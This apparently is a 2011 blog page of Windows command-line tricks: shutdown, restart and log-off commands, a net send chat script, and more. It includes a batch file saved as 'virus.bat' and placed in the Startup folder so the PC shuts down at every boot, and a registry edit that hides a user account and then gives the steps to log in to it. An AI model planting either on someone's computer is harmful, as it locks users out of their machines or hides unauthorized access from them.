Wednesday, May 4, 2011

Shutdown and Restart Trick

Shutdown Trick
Stimulate shutdown from command prompt !
# Start >> Run
# Type shutdown -s -t 10 -c "Shutting Down..."
# Hit Enter and enjoy !

Restart TrickStimulate Restart from command prompt !
# Start >> Run
# Type shutdown -r -t 10 -c "Restarting..."
# Hit Enter and enjoy ! 

Log Off TrickStimulate LogOff from command prompt !
# Start >> Run
# Type shutdown -l
# Hit Enter and enjoy !
We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
Open Notepad
Type :
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
File >> Save As...
Name it : virus.bat
Start >> All Programs
Right Click on Startup >> Open
This open the Startup folder
Paste the Virus.bat file here !
*** That's all , now the computer will automatically shutdown on every startup !

reff : http://pcremix.blogspot.com/

Tuesday, May 3, 2011

No Yahoo Messanger or Gtalk: Learn Command Prompt Chatting using IP address

Though most of us always prefer to chat using the widely used Yahoo Messenger or Gtalk; but for those who just want to try out something different here is an interesting trick. This trick can also be used to chat if you don’t have these chat services installed on any pc connected with Internet.


The trick is using Command Prompt along with the IP address of your friend.
To perform this tricks first open the note pad and copy the below text in bold and paste in notepad
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
and save it with the name you wish better you would be save it as “Messenger.bat”.
2–> Double click the “Messenger.bat” file that you had created now..
3–> Now command prompt will open automatically, displaying a message
MESSENGER
User:
In the user field which is blank type the IP address of the friend’s with whom you want to chat & Hit ENTER
This will next display
Message:
Now type whatever you want share with your friend…. that’s it Enjoy

reff : http://www.tricksnhacking.com

How To Create A Invisible Account In Windows XP

Ok, A really Quick tutorial on for windows XP on How To Create A Invisible Account In Windows Xp. What we have do in this hack is really simple just create a DWORD value in the windows registry and hack the windows user accounts .


Ok so are you sure you want to learn this hack then read ahead,

Steps :-


1. Open Start menu then click on RUN.
2. Type in the Run Window Regedit
3. Windows Registry editor will open then navigate from the left panel :

HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList
4. Create a new DWORD, setting its name to the name of the account you wish to hide.
5. Then set its value to 0 to hide it.
6. Enjoy its Hidden !!

NOTE : This account isn't completely hidden because it is visible to administrators in Local User and Groups and also the profile is visible in the Documents and Settings.
 
Now How To Login In it after you have hidden the account :

1. At Welcome screen, and you want to login to this account.
2. Press Ctrl+Alt+Delete twice and it will display the log-on promt.
3. Type the username, and the password and hit enter.

reff :  http://hackerthedude.blogspot.com